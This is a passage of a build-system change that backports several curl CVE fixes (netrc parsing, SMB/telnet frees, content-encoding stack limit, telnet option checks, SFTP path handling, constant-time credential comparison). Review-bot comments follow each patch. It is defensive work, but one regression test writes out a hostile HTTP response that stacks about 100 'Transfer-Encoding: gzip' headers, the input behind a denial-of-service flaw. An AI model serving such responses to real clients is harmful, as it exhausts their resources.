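++ vlen = strlen(p);
++ return (len != vlen);
++}
++
+ /****************************************************************************
+ *
+ * Curl_cookie_add()
+@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
+ badcookie = TRUE;
+ break;
+ }
++ if(invalid_octets(whatptr) || invalid_octets(name)) {
++ infof(data, "invalid octets in name/value, cookie dropped");
++ badcookie = TRUE;
++ break;
++ }
+ }
+ else if(!len) {
+ /* this was a "<name>=" with no content, and we must allow
+--
+2.35.1
+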
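Review bot: The comment inside `invalid_octets`, `/* scan for all the octets that are *not* in cookie-octet */`, does not describe what the code checks. `badoctets` holds only 0x01-0x1f without TAB plus 0x7f, so space, comma, double quote, backslash and bytes from 0x80 up still pass although they lie outside the RFC 6265 `cookie-octet` range quoted above the function. I would reword it to `/* find the first control byte listed in badoctets */`. The two passes over the string can be one: `return p[strcspn(p, badoctets)] != '\0';`. The call added in `Curl_cookie_add` covers only the name/value pair parsed in that branch; the rest of the function is outside the hunk.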
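--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
+From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 4 Oct 2022 14:37:24 +0200
+Subject: [PATCH] netrc: replace fgets with Curl_get_line
+
+Upstream-Status: Backport
+CVE: CVE-2022-35260
+Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
+
+Make the parser only accept complete lines and avoid problems with
+overly long lines.
+
+Reported-by: Hiroki Kurosawa
+
+Closes #9789
+---
+ lib/curl_get_line.c | 4 ++--
+ lib/netrc.c | 5 +++--
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
+index c4194851ae09..4b9eea9e631c 100644
+--- a/lib/curl_get_line.c
++++ b/lib/curl_get_line.c
+@@ -28,8 +28,8 @@
+ #include "memdebug.h"
+
+ /*
+- * get_line() makes sure to only return complete whole lines that fit in 'len'
+- * bytes and end with a newline.
++ * Curl_get_line() makes sure to only return complete whole lines that fit in
++ * 'len' bytes and end with a newline.
+ */
+ char *Curl_get_line(char *buf, int len, FILE *input)
+ {
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 1c9da31993c9..93239132c9d8 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -31,6 +31,7 @@
+ #include "netrc.h"
+ #include "strtok.h"
+ #include "strcase.h"
++#include "curl_get_line.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
+ char netrcbuffer[4096];
+ int netrcbuffsize = (int)sizeof(netrcbuffer);
+
+- while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
++ while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
+ tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
+ if(tok && *tok == '#')
+ /* treat an initial hash as a comment line */
+@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
+
+ tok = strtok_r(NULL, " \t\n", &tok_buf);
+ } /* while(tok) */
+- } /* while fgets() */
++ } /* while Curl_get_line() */
+
+ out:
+ if(!retcode) {
+--
+2.34.1
+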
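Review bot: Switching `parsenetrc` to `Curl_get_line` changes which lines get parsed. By the comment updated in this same patch, `Curl_get_line` returns only complete lines that "fit in 'len' bytes and end with a newline", so with the 4096-byte `netrcbuffer` an over-long line, and presumably a final line without a trailing newline, is now skipped instead of parsed. For a credentials file that means an entry can be ignored without any message, so I would add a comment at the loop such as `/* Curl_get_line() drops lines that are too long or lack a trailing newline */` and confirm the end-of-file case against the `Curl_get_line` body, which is not part of the hunk. The patch header also carries no `Signed-off-by:` from the backporter, unlike the other curl patches added next to it.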
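--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
+rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 19 Dec 2022 08:38:37 +0100
+Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
+
+It is managed by the generic layer.
+
+Reported-by: Trail of Bits
+
+Closes #10112
+
+CVE: CVE-2022-43552
+Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/smb.c | 14 ++------------
+ lib/telnet.c | 3 ---
+ 2 files changed, 2 insertions(+), 15 deletions(-)
+
+diff --git a/lib/smb.c b/lib/smb.c
+index 12f9925..8db3b27 100644
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
+ static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
+ static CURLcode smb_do(struct connectdata *conn, bool *done);
+ static CURLcode smb_request_state(struct connectdata *conn, bool *done);
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature);
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
+ static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
+ static CURLcode smb_parse_url_path(struct connectdata *conn);
+@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
+ "SMB", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
+ "SMBS", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
+ return CURLE_OK;
+ }
+
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature)
+-{
+- (void) premature;
+- Curl_safefree(conn->data->req.protop);
+- return status;
+-}
+-
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
+ {
+ struct smb_conn *smbc = &conn->proto.smbc;
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 3347ad6..e3b9208 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
+
+ curl_slist_free_all(tn->telnet_vars);
+ tn->telnet_vars = NULL;
+-
+- Curl_safefree(conn->data->req.protop);
+-
+ return CURLE_OK;
+ }
+
+--
+2.25.1
+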
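Review bot: The first line of the patch file reads `rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001`, so the leading `F` of the mbox `From ` marker is missing and tools that parse the mail header (for example `git am`) will not recognise it. It should read `From 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001`. On the code side, removing `Curl_safefree(conn->data->req.protop)` from `smb_done` and `telnet_done` is leak-free only if the generic layer of the curl version being patched frees `req.protop`, as the commit message states. That code is not part of the patch, so it is worth confirming against the patched tree.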
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
1From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
2From: Patrick Monnerat <patrick@monnerat.net>
3Date: Mon, 13 Feb 2023 08:33:09 +0100
4Subject: [PATCH] content_encoding: do not reset stage counter for each header
5
6Test 418 verifies
7
8Closes #10492
9
10Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
11CVE: CVE-2023-23916
12Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
13---
14 lib/content_encoding.c | 7 +-
15 lib/urldata.h | 1 +
16 tests/data/Makefile.inc | 2 +-
17 tests/data/test418 | 152 ++++++++++++++++++++++++++++++++++++++++
18 4 files changed, 157 insertions(+), 5 deletions(-)
19 create mode 100644 tests/data/test418
20
21diff --git a/lib/content_encoding.c b/lib/content_encoding.c
22index 91e621f..7e098a5 100644
23--- a/lib/content_encoding.c
24+++ b/lib/content_encoding.c
25@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
26 {
27 struct Curl_easy *data = conn->data;
28 struct SingleRequest *k = &data->req;
29- int counter = 0;
30
31 do {
32 const char *name;
33@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
34 if(!encoding)
35 encoding = &error_encoding; /* Defer error at stack use. */
36
37- if(++counter >= MAX_ENCODE_STACK) {
38- failf(data, "Reject response due to %u content encodings",
39- counter);
40+ if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
41+ failf(data, "Reject response due to more than %u content encodings",
42+ MAX_ENCODE_STACK);
43 return CURLE_BAD_CONTENT_ENCODING;
44 }
45 /* Stack the unencoding stage. */
46diff --git a/lib/urldata.h b/lib/urldata.h
47index ad0ef8f..168f874 100644
48--- a/lib/urldata.h
49+++ b/lib/urldata.h
50@@ -648,6 +648,7 @@ struct SingleRequest {
51 #ifndef CURL_DISABLE_DOH
52 struct dohdata doh; /* DoH specific data for this request */
53 #endif
54+ unsigned char writer_stack_depth; /* Unencoding stack depth. */
55 BIT(header); /* incoming data has HTTP header */
56 BIT(content_range); /* set TRUE if Content-Range: was found */
57 BIT(upload_done); /* set to TRUE when doing chunked transfer-encoding
58diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
59index 60e8176..40de8bc 100644
60--- a/tests/data/Makefile.inc
61+++ b/tests/data/Makefile.inc
62@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
63 test393 test394 test395 \
64 \
65 test400 test401 test402 test403 test404 test405 test406 test407 test408 \
66-test409 \
67+test409 test418 \
68 \
69 test490 test491 test492 \
70 \
71diff --git a/tests/data/test418 b/tests/data/test418
72new file mode 100644
73index 0000000..50e974e
74--- /dev/null
75+++ b/tests/data/test418
76@@ -0,0 +1,152 @@
77+<testcase>
78+<info>
79+<keywords>
80+HTTP
81+gzip
82+</keywords>
83+</info>
84+
85+#
86+# Server-side
87+<reply>
88+<data nocheck="yes">
89+HTTP/1.1 200 OK
90+Transfer-Encoding: gzip
91+Transfer-Encoding: gzip
92+Transfer-Encoding: gzip
93+Transfer-Encoding: gzip
94+Transfer-Encoding: gzip
95+Transfer-Encoding: gzip
96+Transfer-Encoding: gzip
97+Transfer-Encoding: gzip
98+Transfer-Encoding: gzip
99+Transfer-Encoding: gzip
100+Transfer-Encoding: gzip
101+Transfer-Encoding: gzip
102+Transfer-Encoding: gzip
103+Transfer-Encoding: gzip
104+Transfer-Encoding: gzip
105+Transfer-Encoding: gzip
106+Transfer-Encoding: gzip
107+Transfer-Encoding: gzip
108+Transfer-Encoding: gzip
109+Transfer-Encoding: gzip
110+Transfer-Encoding: gzip
111+Transfer-Encoding: gzip
112+Transfer-Encoding: gzip
113+Transfer-Encoding: gzip
114+Transfer-Encoding: gzip
115+Transfer-Encoding: gzip
116+Transfer-Encoding: gzip
117+Transfer-Encoding: gzip
118+Transfer-Encoding: gzip
119+Transfer-Encoding: gzip
120+Transfer-Encoding: gzip
121+Transfer-Encoding: gzip
122+Transfer-Encoding: gzip
123+Transfer-Encoding: gzip
124+Transfer-Encoding: gzip
125+Transfer-Encoding: gzip
126+Transfer-Encoding: gzip
127+Transfer-Encoding: gzip
128+Transfer-Encoding: gzip
129+Transfer-Encoding: gzip
130+Transfer-Encoding: gzip
131+Transfer-Encoding: gzip
132+Transfer-Encoding: gzip
133+Transfer-Encoding: gzip
134+Transfer-Encoding: gzip
135+Transfer-Encoding: gzip
136+Transfer-Encoding: gzip
137+Transfer-Encoding: gzip
138+Transfer-Encoding: gzip
139+Transfer-Encoding: gzip
140+Transfer-Encoding: gzip
141+Transfer-Encoding: gzip
142+Transfer-Encoding: gzip
143+Transfer-Encoding: gzip
144+Transfer-Encoding: gzip
145+Transfer-Encoding: gzip
146+Transfer-Encoding: gzip
147+Transfer-Encoding: gzip
148+Transfer-Encoding: gzip
149+Transfer-Encoding: gzip
150+Transfer-Encoding: gzip
151+Transfer-Encoding: gzip
152+Transfer-Encoding: gzip
153+Transfer-Encoding: gzip
154+Transfer-Encoding: gzip
155+Transfer-Encoding: gzip
156+Transfer-Encoding: gzip
157+Transfer-Encoding: gzip
158+Transfer-Encoding: gzip
159+Transfer-Encoding: gzip
160+Transfer-Encoding: gzip
161+Transfer-Encoding: gzip
162+Transfer-Encoding: gzip
163+Transfer-Encoding: gzip
164+Transfer-Encoding: gzip
165+Transfer-Encoding: gzip
166+Transfer-Encoding: gzip
167+Transfer-Encoding: gzip
168+Transfer-Encoding: gzip
169+Transfer-Encoding: gzip
170+Transfer-Encoding: gzip
171+Transfer-Encoding: gzip
172+Transfer-Encoding: gzip
173+Transfer-Encoding: gzip
174+Transfer-Encoding: gzip
175+Transfer-Encoding: gzip
176+Transfer-Encoding: gzip
177+Transfer-Encoding: gzip
178+Transfer-Encoding: gzip
179+Transfer-Encoding: gzip
180+Transfer-Encoding: gzip
181+Transfer-Encoding: gzip
182+Transfer-Encoding: gzip
183+Transfer-Encoding: gzip
184+Transfer-Encoding: gzip
185+Transfer-Encoding: gzip
186+Transfer-Encoding: gzip
187+Transfer-Encoding: gzip
188+Transfer-Encoding: gzip
189+Transfer-Encoding: gzip
190+
191+-foo-
192+</data>
193+</reply>
194+
195+#
196+# Client-side
197+<client>
198+<server>
199+http
200+</server>
201+ <name>
202+Response with multiple Transfer-Encoding headers
203+ </name>
204+ <command>
205+http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
206+</command>
207+</client>
208+
209+#
210+# Verify data after the test has been "shot"
211+<verify>
212+<protocol crlf="yes">
213+GET /%TESTNUMBER HTTP/1.1
214+Host: %HOSTIP:%HTTPPORT
215+User-Agent: curl/%VERSION
216+Accept: */*
217+
218+</protocol>
219+
220+# CURLE_BAD_CONTENT_ENCODING is 61
221+<errorcode>
222+61
223+</errorcode>
224+<stderr mode="text">
225+curl: (61) Reject response due to more than 5 content encodings
226+</stderr>
227+</verify>
228+</testcase>
229--
2302.25.1
231
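Review bot: The new `unsigned char writer_stack_depth` in `struct SingleRequest` is only ever incremented in this patch (`k->writer_stack_depth++ >= MAX_ENCODE_STACK`) and nothing here resets it, so the limit is right for a reused handle only if `SingleRequest` is cleared for each transfer. That reset is outside the hunks and should be confirmed for the version being patched; a field comment such as `/* Unencoding stack depth; relies on SingleRequest being zeroed per request */` would record the assumption. `failf` prints `MAX_ENCODE_STACK` with `%u` while the macro is the plain int `5`, so `%d` matches. test418 uses `%TESTNUMBER`, `%HOSTIP` and `%HTTPPORT`; check that the test harness of the patched version expands all three before relying on the test.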
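--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
+Backport of:
+
+From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 6 Mar 2023 12:07:33 +0100
+Subject: [PATCH] telnet: only accept option arguments in ascii
+
+To avoid embedded telnet negotiation commands etc.
+
+Reported-by: Harry Sintonen
+Closes #10728
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
+CVE: CVE-2023-27533
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/telnet.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
+ }
+ }
+
++static bool str_is_nonascii(const char *str)
++{
++ size_t len = strlen(str);
++ while(len--) {
++ if(*str & 0x80)
++ return TRUE;
++ str++;
++ }
++ return FALSE;
++}
++
+ static CURLcode check_telnet_options(struct connectdata *conn)
+ {
+ struct curl_slist *head;
+@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
+ /* Add the user name as an environment variable if it
+ was given on the command line */
+ if(conn->bits.user_passwd) {
++ if(str_is_nonascii(data->conn->user))
++ return CURLE_BAD_FUNCTION_ARGUMENT;
+ msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
+ beg = curl_slist_append(tn->telnet_vars, option_arg);
+ if(!beg) {
+@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
+ if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
+ option_keyword, option_arg) == 2) {
+
++ if(str_is_nonascii(option_arg))
++ continue;
++
+ /* Terminal type */
+ if(strcasecompare(option_keyword, "TTYPE")) {
+ strncpy(tn->subopt_ttype, option_arg, 31);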
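Review bot: In `check_telnet_options` the new check validates `data->conn->user` while the very next line formats `conn->user`; checking the expression that is actually used, `if(str_is_nonascii(conn->user))`, makes it plain that the validated string is the one sent. The two rejections also behave differently: a non-ASCII user name returns `CURLE_BAD_FUNCTION_ARGUMENT`, whereas a non-ASCII option argument is dropped by `continue` with nothing logged, so a comment such as `/* silently skip options with non-ASCII arguments */` (or an `infof` call) would help whoever has to debug a missing option. `str_is_nonascii` tests only the high bit, so ASCII control bytes still pass. The function continues outside the hunks.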
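diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
+From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
+From: Eric Vigeant <evigeant@gmail.com>
+Date: Wed, 2 Nov 2022 11:47:09 -0400
+Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
+
+When using SFTP and a path relative to the user home, do not add a
+trailing '/' to the user home dir if it already ends with one.
+
+Closes #9844
+
+CVE: CVE-2023-27534
+Note:
+- The upstream patch for CVE-2023-27534 does three things:
+1) creates new path with dynbuf(dynamic buffer)
+2) solves the tilde error which causes CVE-2023-27534
+3) modifies the below added functionality to not add a trailing "/" to the user home dir if it already ends with one with dynbuf.
+- dynbuf functionalities are added in curl in later versions and are not essential to fix the vulnerability but does add extra feature in later versions.
+- This patch completes the 3rd task of the patch which was implemented without using dynbuf
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index f429634..40b92ee 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ /* It is referenced to the home directory, so strip the
+ leading '/' */
+ memcpy(real_path, homedir, homelen);
+- real_path[homelen] = '/';
+- real_path[homelen + 1] = '\0';
++ /* Only add a trailing '/' if homedir does not end with one */
++ if(homelen == 0 || real_path[homelen - 1] != '/') {
++ real_path[homelen] = '/';
++ homelen++;
++ real_path[homelen] = '\0';
++ }
+ if(working_path_len > 3) {
+- memcpy(real_path + homelen + 1, working_path + 3,
++ memcpy(real_path + homelen, working_path + 3,
+ 1 + working_path_len -3);
+ }
+ }
+--
+2.24.4
+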
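Review bot: The string terminator is now written only inside the new `if`, so when `homedir` already ends in '/' and `working_path_len` is 3 or less (the later `memcpy`, which copies the terminator, is then skipped) `real_path` is left without a NUL; the removed lines always wrote one. Keeping `real_path[homelen] = '/'; homelen++;` inside the branch and moving `real_path[homelen] = '\0';` to just after its closing brace restores the guarantee. `Curl_getworkingpath` starts and ends outside the hunk, so whether a path that short can reach this branch depends on the guard above it.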
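diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
+From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 16:22:11 +0100
+Subject: [PATCH] curl_path: create the new path with dynbuf
+
+Closes #10729
+
+CVE: CVE-2023-27534
+Note: This patch is needed to backport CVE-2023-27534
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index 40b92ee..598c5dd 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ memcpy(real_path, working_path, 1 + working_path_len);
+ }
+ else if(conn->handler->protocol & CURLPROTO_SFTP) {
+- if((working_path_len > 1) && (working_path[1] == '~')) {
++ if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
+ size_t homelen = strlen(homedir);
+ real_path = malloc(homelen + working_path_len + 1);
+ if(real_path == NULL) {
+--
+2.24.4
+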
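Review bot: The new guard `!memcmp(working_path, "/~/", 3)` carries no comment saying which inputs it now excludes, and the patch header keeps the upstream subject "create the new path with dynbuf" although the backported hunk retains the `malloc` and only tightens the condition. A comment above the test would record the intent, for example `/* expand only a leading "/~/"; "/~" followed by anything else is not the home directory */`. Where such paths go instead is decided in the part of `Curl_getworkingpath` outside the hunk, so that branch should be checked against the intended behaviour.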
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
1From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 6 Oct 2022 00:49:10 +0200
4Subject: [PATCH] strcase: add and use Curl_timestrcmp
5
6This is a strcmp() alternative function for comparing "secrets",
7designed to take the same time no matter the content to not leak
8match/non-match info to observers based on how fast it is.
9
10The time this function takes is only a function of the shortest input
11string.
12
13Reported-by: Trail of Bits
14
15Closes #9658
16
17Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
18Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 lib/netrc.c | 6 +++---
22 lib/strcase.c | 22 ++++++++++++++++++++++
23 lib/strcase.h | 1 +
24 lib/url.c | 33 +++++++++++++--------------------
25 lib/vauth/digest_sspi.c | 4 ++--
26 lib/vtls/vtls.c | 21 ++++++++++++++++++++-
27 6 files changed, 61 insertions(+), 26 deletions(-)
28
29diff --git a/lib/netrc.c b/lib/netrc.c
30index 9323913..fe3fd1e 100644
31--- a/lib/netrc.c
32+++ b/lib/netrc.c
33@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
34 /* we are now parsing sub-keywords concerning "our" host */
35 if(state_login) {
36 if(specific_login) {
37- state_our_login = strcasecompare(login, tok);
38+ state_our_login = !Curl_timestrcmp(login, tok);
39 }
40- else if(!login || strcmp(login, tok)) {
41+ else if(!login || Curl_timestrcmp(login, tok)) {
42 if(login_alloc) {
43 free(login);
44 login_alloc = FALSE;
45@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
46 }
47 else if(state_password) {
48 if((state_our_login || !specific_login)
49- && (!password || strcmp(password, tok))) {
50+ && (!password || Curl_timestrcmp(password, tok))) {
51 if(password_alloc) {
52 free(password);
53 password_alloc = FALSE;
54diff --git a/lib/strcase.c b/lib/strcase.c
55index 70bf21c..ec776b3 100644
56--- a/lib/strcase.c
57+++ b/lib/strcase.c
58@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
59 return !a && !b;
60 }
61
62+/*
63+ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
64+ * function spends is a function of the shortest string, not of the contents.
65+ */
66+int Curl_timestrcmp(const char *a, const char *b)
67+{
68+ int match = 0;
69+ int i = 0;
70+
71+ if(a && b) {
72+ while(1) {
73+ match |= a[i]^b[i];
74+ if(!a[i] || !b[i])
75+ break;
76+ i++;
77+ }
78+ }
79+ else
80+ return a || b;
81+ return match;
82+}
83+
84 /* --- public functions --- */
85
86 int curl_strequal(const char *first, const char *second)
87diff --git a/lib/strcase.h b/lib/strcase.h
88index 8929a53..8077108 100644
89--- a/lib/strcase.h
90+++ b/lib/strcase.h
91@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
92 void Curl_strntolower(char *dest, const char *src, size_t n);
93
94 bool Curl_safecmp(char *a, char *b);
95+int Curl_timestrcmp(const char *first, const char *second);
96
97 #endif /* HEADER_CURL_STRCASE_H */
98diff --git a/lib/url.c b/lib/url.c
99index 9f14a7b..dfbde3b 100644
100--- a/lib/url.c
101+++ b/lib/url.c
102@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
103 /* the user information is case-sensitive
104 or at least it is not defined as case-insensitive
105 see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
106- if((data->user == NULL) != (needle->user == NULL))
107- return FALSE;
108- /* curl_strequal does a case insentive comparison, so do not use it here! */
109- if(data->user &&
110- needle->user &&
111- strcmp(data->user, needle->user) != 0)
112- return FALSE;
113- if((data->passwd == NULL) != (needle->passwd == NULL))
114- return FALSE;
115+
116 /* curl_strequal does a case insentive comparison, so do not use it here! */
117- if(data->passwd &&
118- needle->passwd &&
119- strcmp(data->passwd, needle->passwd) != 0)
120+ if(Curl_timestrcmp(data->user, needle->user) ||
121+ Curl_timestrcmp(data->passwd, needle->passwd))
122 return FALSE;
123 return TRUE;
124 }
125@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
126 if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
127 /* This protocol requires credentials per connection,
128 so verify that we're using the same name and password as well */
129- if(strcmp(needle->user, check->user) ||
130- strcmp(needle->passwd, check->passwd) ||
131- !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
132- !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
133+ if(Curl_timestrcmp(needle->user, check->user) ||
134+ Curl_timestrcmp(needle->passwd, check->passwd) ||
135+ Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
136+ Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {
137 /* one of them was different */
138 continue;
139 }
140@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
141 possible. (Especially we must not reuse the same connection if
142 partway through a handshake!) */
143 if(wantNTLMhttp) {
144- if(strcmp(needle->user, check->user) ||
145- strcmp(needle->passwd, check->passwd)) {
146+ if(Curl_timestrcmp(needle->user, check->user) ||
147+ Curl_timestrcmp(needle->passwd, check->passwd)) {
148
149 /* we prefer a credential match, but this is at least a connection
150 that can be reused and "upgraded" to NTLM */
151@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
152 if(!check->http_proxy.user || !check->http_proxy.passwd)
153 continue;
154
155- if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
156- strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
157+ if(Curl_timestrcmp(needle->http_proxy.user,
158+ check->http_proxy.user) ||
159+ Curl_timestrcmp(needle->http_proxy.passwd,
160+ check->http_proxy.passwd))
161 continue;
162 }
163 else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
164diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
165index a109056..3986386 100644
166--- a/lib/vauth/digest_sspi.c
167+++ b/lib/vauth/digest_sspi.c
168@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
169 has changed then delete that context. */
170 if((userp && !digest->user) || (!userp && digest->user) ||
171 (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
172- (userp && digest->user && strcmp(userp, digest->user)) ||
173- (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
174+ (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
175+ (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
176 if(digest->http_context) {
177 s_pSecFn->DeleteSecurityContext(digest->http_context);
178 Curl_safefree(digest->http_context);
179diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
180index e8cb70f..70a9391 100644
181--- a/lib/vtls/vtls.c
182+++ b/lib/vtls/vtls.c
